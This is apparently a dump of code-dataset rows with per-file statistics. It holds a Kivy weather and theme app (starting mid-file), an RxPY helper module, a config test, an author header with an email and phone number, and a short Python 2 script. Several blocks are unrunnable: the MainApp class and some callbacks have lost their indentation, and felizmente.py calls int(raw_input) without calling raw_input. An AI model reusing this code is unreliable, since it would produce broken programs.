            response2 = requests.get(self.conditions_image2)
            response3 = requests.get(self.conditions_image3)
            response4 = requests.get(self.conditions_image4)
            if response1.status_code == 200:
                f = open("./icons/wc1.png", 'wb')
                f.write(response1.content)
                print "saving image 1"
                f.close()
            if response2.status_code == 200:
                f = open("./icons/wc2.png", 'wb')
                f.write(response2.content)
                print "saving image 2"
                f.close()
            if response3.status_code == 200:
                f = open("./icons/wc3.png", 'wb')
                f.write(response3.content)
                print "saving image 3"
                f.close()
            if response4.status_code == 200:
                f = open("./icons/wc4.png", 'wb')
                f.write(response4.content)
                print "saving image 4"
                f.close()
            #self.parent.ids.current.ids.temp_min = result['list'][0]['temp']['min']
            #self.parent.ids.current.ids.temp_max = result['list'][0]['temp']['max']
            self.conditions1 = result['list'][1]['weather'][0]['description']
            self.conditions2 = result['list'][2]['weather'][0]['description']
            self.conditions3 = result['list'][3]['weather'][0]['description']
            self.conditions4 = result['list'][4]['weather'][0]['description']
            self.temp_min1 = result['list'][1]['temp']['min']
            self.temp_max1 = result['list'][1]['temp']['max']
            self.temp_min2 = result['list'][2]['temp']['min']
            self.temp_max2 = result['list'][2]['temp']['max']
            self.temp_min3 = result['list'][3]['temp']['min']
            self.temp_max3 = result['list'][3]['temp']['max']
            self.temp_min4 = result['list'][4]['temp']['min']
            self.temp_max4 = result['list'][4]['temp']['max']
            #self.parent.ids.current.ids.temp = result['list'][0]['temp']['eve']
            print "made it"
            print self.parent.parent.parent.parent.parent.ids
            self.parent.parent.parent.parent.parent.ids.status_label.text = "updated"
        except:
            traceback.print_exc()
            print self.parent.parent
            self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
class History(BoxLayout):
    """Placeholder screen; its layout comes entirely from kv."""
    pass
class Together(gesture.GestureBox):
    """Root gesture container: restores the persisted theme on start-up and
    draws coloured touch trails while the user gestures.

    Fixes: the original declared ``theme = StringProperty('')`` twice (the
    first declaration was dead) and gave ``theme2``/``theme3`` a string
    default (``NumericProperty('')``) unlike their siblings; both cleaned up.
    """

    # Theme as the raw "r,g,b,a" string plus its four numeric components
    # (bound from kv).
    theme = StringProperty('')
    theme0 = NumericProperty()
    theme1 = NumericProperty()
    theme2 = NumericProperty()
    theme3 = NumericProperty()

    def __init__(self,**kwargs):
        super(Together,self).__init__(**kwargs)
        # Restore the saved theme colour; close the file even on parse errors.
        in_file = open("./json/theme.json","r")
        try:
            self.theme = json.load(in_file)['theme']
        finally:
            in_file.close()
        parts = self.theme.split(',')
        self.theme0 = float(parts[0])
        self.theme1 = float(parts[1])
        self.theme2 = float(parts[2])
        self.theme3 = float(parts[3])

    def on_touch_down(self, touch):
        # Begin a coloured trail at the touch point.  Errors are deliberately
        # swallowed so a failed canvas draw never breaks gesture recognition.
        try:
            gesture.GestureBox.on_touch_down(self, touch)
            color = (random(), 1, 1)
            with self.canvas:
                Color(*color, mode='hsv')
                touch.ud['line'] = Line(points=(touch.x, touch.y), width=5)
        except:
            pass

    def on_touch_move(self, touch):
        # Extend the trail -- except on the game screen, where a trail would
        # obscure the ping-pong playfield.
        try:
            gesture.GestureBox.on_touch_move(self, touch)
            if self.ids.manager.current == "game":
                touch.ud['line'].points = []
            else:
                touch.ud['line'].points += [touch.x, touch.y]
        except:
            pass
class User(BoxLayout):
    """Root application widget.  The nine ``callbackN`` methods are theme
    handlers for the navigation bar: each persists a theme colour to
    ./json/theme.json and repaints the background of the ``together`` widget.

    The nine near-identical bodies of the original are collapsed onto one
    private helper; each callback keeps its original name and signature.
    """

    def _apply_theme(self, item, rgba_string):
        """Persist *rgba_string* ("r,g,b,a") and paint the root background.

        *item* is the tapped menu widget; the app root is reached by walking
        nine levels up its parent chain (mirrors the original hard-coded
        traversal, which is fixed by the kv layout).
        """
        out_file = open("./json/theme.json","w")
        json.dump({'theme': rgba_string}, out_file, indent=4)
        out_file.close()
        root = item.parent.parent.parent.parent.parent.parent.parent.parent.parent
        together = root.ids.together
        rgba = tuple(float(v) for v in rgba_string.split(','))
        # Oversized rectangle (offset -200, largest dimension +500) so the
        # background fully covers the window in any orientation.
        with together.canvas.before:
            Color(rgba=rgba)
            Rectangle(pos=(together.pos[0] - 200, together.pos[1] - 200),
                      size=(max(together.size) + 500, max(together.size) + 500))

    def callback1(self, *args):
        self._apply_theme(args[0], '.266,.423,.701,1')

    def callback2(self, *args):
        self._apply_theme(args[0], '.839,.270,.254,1')

    def callback3(self, *args):
        self._apply_theme(args[0], '.749,.333,.925,1')

    def callback4(self, *args):
        self._apply_theme(args[0], '.2,.431,.482,1')

    def callback5(self, *args):
        self._apply_theme(args[0], '.149,.560,.356,1')

    def callback6(self, *args):
        self._apply_theme(args[0], '.949,.470,.294,1')

    def callback7(self, *args):
        self._apply_theme(args[0], '.423,.478,.537,1')

    def callback8(self, *args):
        self._apply_theme(args[0], '.323,.7,.2,1')

    def callback9(self, *args):
        self._apply_theme(args[0], '.323,.1,.32,1')
from kivy.clock import Clock
from kivy.properties import BooleanProperty

# Native Android helpers are only importable when running on-device.
if platform == "android":
    import android
    from jnius import autoclass, cast
    from android.runnable import run_on_ui_thread
    Toast = autoclass("android.widget.Toast")
    from jnius import autoclass
    # Context is a normal java class in the Android API
    Context = autoclass('android.content.Context')
    # PythonActivity is provided by the Kivy bootstrap app in python-for-android
    PythonActivity = autoclass('org.renpy.android.PythonActivity')
    # The PythonActivity stores a reference to the currently running activity
    # We need this to access the vibrator service
    #activity = PythonActivity.mActivity
class MainApp(App):
exitnext = BooleanProperty(False)
use_kivy_settings = False
def __init__(self, *args, **kwargs):
    # No extra initialisation needed; forwards everything to App.
    super(MainApp, self).__init__(*args, **kwargs)
def build(self):
    """Create the root widget; on Android, defer key mapping to on_start."""
    if platform == "android":
        # Key mapping needs the window, which only exists after start-up.
        self.bind(on_start=self.post_build_init)
    return User()
if platform == "android":
    @run_on_ui_thread
    def toast(self, text, duration):
        """Show a native Android toast on the UI thread.

        Duration is either 0 = short = 2 sec, or 1 = long = 3.5 sec.
        """
        String = autoclass('java.lang.String')
        c = cast('java.lang.CharSequence', String(text))
        context = PythonActivity.mActivity.getApplicationContext()
        t = Toast.makeText(context, c, duration)
        t.show()
        return t
else:
    # Desktop builds get no toast method; hide_kbd_or_exit never calls it.
    pass
def post_build_init(self, *args):
    """After start-up, route hardware Back/Menu keys through _key_handler."""
    # Map Android keys onto codes Kivy will deliver via on_keyboard.
    if platform == 'android':
        android.map_key(android.KEYCODE_BACK, 1000)
        android.map_key(android.KEYCODE_MENU, 1001)
    win = self._app_window
    win.bind(on_keyboard=self._key_handler)
def _key_handler(self, *args):
    """Consume Escape (27) or the mapped Android Back key (1000)."""
    pressed = args[1]
    if pressed not in (1000, 27):
        # Not ours -- let Kivy keep dispatching.
        return None
    self.hide_kbd_or_exit()
    return True
def hide_kbd_or_exit(self, *args):
    """First Back press hides the keyboard and warns; a second within 2s exits."""
    if platform == "android" and not self.exitnext:
        android.hide_keyboard()
        # Arm a 2-second window during which another Back press will exit.
        self.exitnext = True
        Clock.schedule_once(lambda *args: setattr(self, "exitnext", False), 2)
        self.toast(("Press Back again to exit"), 0)
    else:
        self.stop()
def build_config(self, config):
    """Register default settings before the config file is loaded."""
    defaults = {'temp_type': "Metric"}
    config.setdefaults('General', defaults)
def build_settings(self, settings):
    """Add the app's settings panel.

    add_json_panel params: title, always self.config, and a filename or raw
    JSON data describing the options.
    """
    settings.add_json_panel("Weather Settings", self.config, data="""
[
{"type": "options",
"title": "Temperature System",
"section": "General",
"key": "temp_type",
"options": ["Metric", "Imperial"]
}
]""")
def on_config_change(self, config, section, key, value):
    """Refresh the weather display when the unit system setting flips."""
    if config is not self.config or key != "temp_type":
        return
    try:
        self.root.children[0].update_weather()
    except AttributeError:
        # The current root child has no update_weather method; ignore.
        pass
def on_pause(self):
    # Allow the app to be paused (Android) instead of being stopped.
    return True

def on_resume(self):
    # Nothing to restore on resume.
    pass

def on_touch_down(self,touch):
    # Touches are handled by the widgets themselves; the App ignores them.
    pass
def callback1(self, *args):
    """Open the first wheel-menu theme submenu (Themes 1-5)."""
    args[0].parent.open_submenu(
        choices=[
            dict(text='Theme 1', index=1, callback=self.callback2),
            dict(text='Theme 2', index=2, callback=self.callback3),
            dict(text='Theme 3', index=3, callback=self.callback7),
            dict(text='Theme 4', index=4, callback=self.callback8),
            dict(text='Theme 5', index=5, callback=self.callback9),
        ])
def callback4(self,*args):
    """Open the second wheel-menu theme submenu (Themes 6-9)."""
    args[0].parent.open_submenu(
        choices=[
            dict(text='Theme 6', index=1, callback=self.callback10),
            dict(text='Theme 7', index=2, callback=self.callback11),
            dict(text='Theme 8', index=3, callback=self.callback12),
            dict(text='Theme 9', index=4, callback=self.callback13),
        ])
def callback2(self, *args):
    """Apply Theme 1: persist its colour and repaint the menu's ancestor.

    The stray debug ``print args[0]`` has been removed; no sibling callback
    (callback3..callback13) had one.
    """
    out_file = open("./json/theme.json","w")
    theme = {'theme': '.266,.423,.701,1'}
    json.dump(theme, out_file, indent=4)
    out_file.close()
    # Repaint the wheel menu's great-grandparent, overshooting by 200px so
    # the colour covers the whole visible area.
    target = args[0].parent.parent.parent
    with target.canvas.before:
        Color(rgba=(.266, .423, .701, 1))
        Rectangle(pos=target.pos,
                  size=(max(target.size) + 200, max(target.size) + 200))
def callbackabout(self, *args):
    """Switch to the 'about' screen and close the wheel menu."""
    args[0].parent.parent.parent.ids.manager.current = 'about'
    args[0].parent.dismiss()
def callback3(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.839,.270,.254,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.839,.270,.254,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback7(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.749,.333,.925,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.749,.333,.925,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback8(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.2,.431,.482,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.2,.431,.482,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback9(self, *args):
    """Persist theme rgba '.149,.560,.356,1' and repaint the background.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.149,.560,.356,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # Oversize the square so the background covers the window at any size.
    side = max(root.size) + 200
    with root.canvas.before:
        Color(rgba=(.149, .560, .356, 1))
        Rectangle(pos=root.pos, size=(side, side))
def callback10(self, *args):
    """Persist theme rgba '.949,.470,.294,1' and repaint the background.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.949,.470,.294,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # Oversize the square so the background covers the window at any size.
    side = max(root.size) + 200
    with root.canvas.before:
        Color(rgba=(.949, .470, .294, 1))
        Rectangle(pos=root.pos, size=(side, side))
def callback11(self, *args):
    """Persist theme rgba '.423,.478,.537,1' and repaint the background.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.423,.478,.537,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # Oversize the square so the background covers the window at any size.
    side = max(root.size) + 200
    with root.canvas.before:
        Color(rgba=(.423, .478, .537, 1))
        Rectangle(pos=root.pos, size=(side, side))
def callback12(self, *args):
    """Persist theme rgba '.323,.7,.2,1' and repaint the background.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.323,.7,.2,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # NOTE(review): sibling callbacks pad the square by +200; the +500
    # here may be deliberate — confirm before normalising.
    side = max(root.size) + 500
    with root.canvas.before:
        Color(rgba=(.323, .7, .2, 1))
        Rectangle(pos=root.pos, size=(side, side))
def callback13(self, *args):
    """Persist theme rgba '.323,.1,.32,1' and repaint the background.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.323,.1,.32,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # NOTE(review): sibling callbacks pad the square by +200; the +500
    # here may be deliberate — confirm before normalising.
    side = max(root.size) + 500
    with root.canvas.before:
        Color(rgba=(.323, .1, .32, 1))
        Rectangle(pos=root.pos, size=(side, side))
def callback5(self, *args):
    """Open the app's settings panel, then close the menu that triggered it."""
    self.open_settings()
    menu = args[0].parent
    menu.dismiss()
def callback6(self, *args):
    """Persist theme rgba '.323,.2,.7,1', repaint the background, close the menu.

    ``args[0]`` is the tapped menu item; the repainted widget is assumed
    to be three parents up the tree — confirm against the widget layout.
    """
    # Save the chosen theme so it can be restored on the next launch.
    with open("./json/theme.json", "w") as out_file:
        json.dump({'theme': '.323,.2,.7,1'}, out_file, indent=4)
    root = args[0].parent.parent.parent
    # Oversize the square so the background covers the window at any size.
    side = max(root.size) + 200
    with root.canvas.before:
        # Fix: the colour applied here was (.323,.7,.7,1), disagreeing with
        # the persisted theme string, so the colour shown immediately
        # differed from the one restored on restart. Use the persisted value.
        Color(rgba=(.323, .2, .7, 1))
        Rectangle(pos=root.pos, size=(side, side))
    args[0].parent.dismiss()
if __name__ == '__main__':
    # Start the Kivy application's event loop when run as a script.
    MainApp().run()
| 48.823466
| 225
| 0.6065
| 5,725
| 45,357
| 4.726463
| 0.097642
| 0.25012
| 0.296685
| 0.292694
| 0.700469
| 0.681252
| 0.661037
| 0.639233
| 0.629624
| 0.612735
| 0
| 0.030436
| 0.227087
| 45,357
| 928
| 226
| 48.876078
| 0.741421
| 0.041471
| 0
| 0.504155
| 0
| 0.01108
| 0.145853
| 0.00511
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.009695
| 0.051247
| null | null | 0.044321
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d5cba7cd3dcb2222d3851506c1a53a7eee120ef8
| 765
|
py
|
Python
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 153
|
2015-10-23T09:00:08.000Z
|
2022-03-19T03:24:04.000Z
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 165
|
2015-09-24T09:53:06.000Z
|
2022-03-31T09:55:06.000Z
|
modules/google-earth-engine/docker/sepal-ee/sepal/rx/__init__.py
|
BuddyVolly/sepal
|
6a2356a88940a36568b1d83ba3aeaae4283d5445
|
[
"MIT"
] | 46
|
2016-07-10T10:40:09.000Z
|
2021-11-14T01:07:33.000Z
|
from typing import Callable
import rx
from rx import Observable, generate, of
from rx.operators import flat_map
from sepal.rx import operators
from .aside import aside
from .file import using_file
from .subscribe_and_wait import subscribe_and_wait
def forever():
    """Return an Observable that emits its ``None`` state indefinitely.

    Built on ``rx.generate`` with a condition that is always true and an
    iterate step that keeps the state at ``None``.
    """
    def never_done(_):
        return True

    def keep_none(_):
        return None

    return generate(None, never_done, keep_none)
def dispose():
    """Push ``True`` onto the module-level ``_dispose`` subject in
    ``sepal.rx.operators`` — presumably operators built by that module
    subscribe to it to tear work down; confirm against the operators module.
    """
    operators._dispose.on_next(True)
def throw(e):
    """Return an Observable that errors with ``e``.

    The exception is raised and immediately caught here so that it gains a
    local traceback (``e.__traceback__``) before ``rx.throw`` re-emits it —
    presumably so downstream error handlers see where ``throw`` was called;
    confirm against callers.
    """
    # noinspection PyBroadException
    try:
        raise e
    except Exception:
        return rx.throw(e)
def flat_map_of(action: Callable) -> Callable[[Observable], Observable]:
    """Return a ``flat_map`` operator that ignores each source item and
    flat-maps into the Observable produced by calling ``action()``."""
    def run_action(_):
        return action()

    return flat_map(run_action)
def merge_finalize(handler: Callable[[], Observable]) -> Observable:
    """Emit ``True`` through the ``operators.merge_finalize`` pipeline,
    delegating finalize handling to ``handler``."""
    source = of(True)
    finalizer = operators.merge_finalize(handler)
    return source.pipe(finalizer)
| 20.675676
| 72
| 0.722876
| 99
| 765
| 5.424242
| 0.40404
| 0.039106
| 0.05959
| 0.126629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189542
| 765
| 36
| 73
| 21.25
| 0.866129
| 0.037909
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.347826
| 0.130435
| 0.73913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
d5d0ca84ef5e1cf4dc518ab2ff18626ab2b70e74
| 181
|
py
|
Python
|
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | null | null | null |
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | 4
|
2021-03-30T13:27:30.000Z
|
2021-09-22T19:03:49.000Z
|
kungfucms/apps/api/__init__.py
|
youngershen/kungfucms
|
1a4371606166eedcab693706d388071f849a4259
|
[
"MIT"
] | null | null | null |
# PROJECT : kungfucms
# TIME : 2020/6/8 10:50
# AUTHOR : Younger Shen
# EMAIL : shenyangang@163.com
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
| 22.625
| 32
| 0.701657
| 23
| 181
| 5.521739
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 0.171271
| 181
| 7
| 33
| 25.857143
| 0.613333
| 0.917127
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d5d239a865f85d59a091c2d85f5599f3dddfaec8
| 57
|
py
|
Python
|
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
utils/heatmap/__init__.py
|
SERI-EPI-DS/pterygium_detection
|
5d56896cec4f154bd5e10ddf4db079b1e8d8564d
|
[
"MIT"
] | null | null | null |
from .allcam import AllCAM
from .heatmap_utils import *
| 19
| 28
| 0.789474
| 8
| 57
| 5.5
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 57
| 2
| 29
| 28.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
d5dda655f115012f16e5ad8069c861dc1b8cbded
| 22
|
py
|
Python
|
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
data/dataset/__init__.py
|
Shashank-Holla/motleyNet
|
05a8c758f650a90f5f53e51bb89909fdc1b735f4
|
[
"MIT"
] | null | null | null |
from .CIFAR10 import *
| 22
| 22
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 0.136364
| 22
| 1
| 22
| 22
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
914205fa494f53fa929db28f20d7b4d1f812346c
| 175
|
py
|
Python
|
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
tests/test_system.py
|
piotr-szpetkowski/straal-python
|
f72fe0aed734bf5439c4ddee9bc9bad12f619c33
|
[
"Apache-2.0"
] | null | null | null |
import straal
def test_straal_config_is_mocked(straal_base_url):
    """The test fixtures should have pointed straal at dummy credentials."""
    expected_key = "DUMMY_TEST_API_KEY"
    assert straal.get_api_key() == expected_key
    assert straal.get_base_url() == straal_base_url
| 25
| 55
| 0.788571
| 28
| 175
| 4.392857
| 0.5
| 0.170732
| 0.211382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125714
| 175
| 6
| 56
| 29.166667
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 0.102857
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9143ae25b490e4108be1ac3036a402ddb1130043
| 130
|
py
|
Python
|
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
reto 1/felizmente.py
|
SeaWar741/CodingRush2017
|
3dc41e82fa0261148dee4db5d80033387c958d5d
|
[
"Apache-2.0"
] | null | null | null |
n = int(raw_input)
k = int(raw_input)
p = 1
for i in range(n):
x = int(raw_input)
if x < k:
p +=1
print p
| 14.444444
| 23
| 0.5
| 26
| 130
| 2.384615
| 0.538462
| 0.290323
| 0.532258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 0.369231
| 130
| 8
| 24
| 16.25
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.